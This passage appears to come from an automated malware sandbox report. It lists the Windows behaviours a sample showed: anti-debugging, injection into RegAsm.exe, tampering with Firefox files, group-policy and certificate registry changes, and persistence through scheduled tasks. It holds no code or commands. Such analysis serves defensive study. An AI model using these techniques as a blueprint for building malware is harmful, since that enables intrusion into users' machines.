File opened for modification C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.inf C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.inf C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.sys C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt C:\Windows\System32\MsiExec.exe N/A
File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.cat C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4460 set thread context of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4416 set thread context of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 232 set thread context of 1440 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 8 set thread context of 4196 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3312 set thread context of 1820 N/A C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Oracle\VirtualBox\VBoxExtPackHelperApp.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_eu.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ko.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_ca.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_uk.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\debian_postinstall.sh C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\Qt5CoreVBox.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UICommon.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_de.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_da.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_en.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\rhel5_ks.cfg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\fedora_ks.cfg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\x86\msvcr100.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ecOJmsgAHWlsC\HGutlUL.xml C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\lgw_postinstall.sh C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\redhat_postinstall.sh C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxNetDHCP.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxSDL.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_th.qm C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxManage.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxTestOGL.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_hr_HR.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_cs.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\Qt5GuiVBox.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\Qt5OpenGLVBox.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\x86\VBoxRT-x86.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxSharedFolders.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\sdk\install\vboxapi\VirtualBox_constants.py C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\HuiWsgF.dll C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxGuestControlSvc.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_pt_BR.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_hu.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_ja.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\redhat67_ks.cfg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\rhel4_ks.cfg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\qIYKRzUEasUn\rnqvXYH.dll C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxDbg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxHostChannel.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxDDR0.r0 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VirtualBox.chm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_lt.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ru.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_es.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\qIYKRzUEasUn\nPlrOrC.dll C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
File created C:\Program Files\Oracle\VirtualBox\msvcr100.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxAutostartSvc.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.sys C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxSupLib.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\DbgPlugInDiggers.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\License_en_US.rtf C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxBugReport.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ja.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_it.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\platforms\qminimal.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\platforms\qwindows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fr.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_th.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_zh_CN.qm C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI2E05.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\chrosha.job C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A
File opened for modification C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5b5f05.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2B53.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\yfARWRprRqUFWeTGf.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\Installer\MSIDCB3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2AF5.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\JHJXtPPPvDXVqpH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\JHJXtPPPvDXVqpH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Installer\SourceHash{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI76F2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF79F.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\Installer\e5b5f05.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5b5f09.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Downloaded Installations\{97657C9B-F62F-4B80-92E3-C146A666778F}\Charity Engine.msi C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe N/A
File opened for modification C:\Windows\Tasks\yfARWRprRqUFWeTGf.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\aNyMQclguOCSCcjxm.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8182.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Downloaded Installations\{97657C9B-F62F-4B80-92E3-C146A666778F}\Charity Engine.msi C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc309361a0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{34d48da6-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\FileAssociations\ProgIds C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
